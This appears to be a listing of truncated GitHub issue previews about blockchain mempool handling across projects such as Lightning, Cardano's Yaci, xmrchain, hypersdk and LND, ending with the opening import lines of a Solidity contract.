-
The issue is that usually with Counterparty you're only spending dust BTC (which people, esp. you yourself, are very unlikely to try to double-spend).
Another option: we could default to disallowing …
-
Hi @t-bast,
I am sure that your pages about lightning are a great learning resource for many lightning devs and enthusiats.
It would be great to see a document in this repo about mempool replaceme…
-
Prob a question for @patrick-ogrady
Any thoughts on using the bitcoin zmq pubsub to sync the indexer instead of the current polling based method?
This could greatly reduce both the sync time and l…
-
Hello,
I've been using Yaci to both listen mempool and submit tx via N2C protocol.
I've been using https://github.com/bloxbean/yaci/blob/main/helper/src/main/java/com/bloxbean/cardano/yaci/helpe…
-
For some testing purposes it would be nice to have a mock network module that is configurable.
There are different mocking versions that we could have:
- Preconfigured message stack
- We co…
-
The API of https://xmrchain.net no longer works.
E.g. https://xmrchain.net/api/outputsblocks?address=XXXX&viewkey=XXX&limit=5&mempool=1
-
From https://github.com/ava-labs/hypersdk/discussions/357
Currently AppGossip messages are parsed into transactions and submitted to the mempool. Hypervms may wish to gossip messages that do not fo…
-
The node 3.135.218.147 keeps crashing. Some excerpts of the log before the crashes are shown below. Full logs also available.
**Excerpt 1**
```
021-05-14 09:36:49 AddToWallet fa537e52381303649b21…
-
LND 0.16.1`
Linux btcpayserver on aws Ubuntu
Run command line pendingchannels and have 2 channels sitting in `waiting to close' with following details reported
"waiting_close_channels": [
…
-
//SPDX-License-Identifier: MIT
pragma solidity ^0.6.6;
// Import Libraries Migrator/Exchange/Factory
import "github.com/Uniswap/uniswap-v2-periphery/blob/master/contracts/interfaces/IUniswapV2Migrato…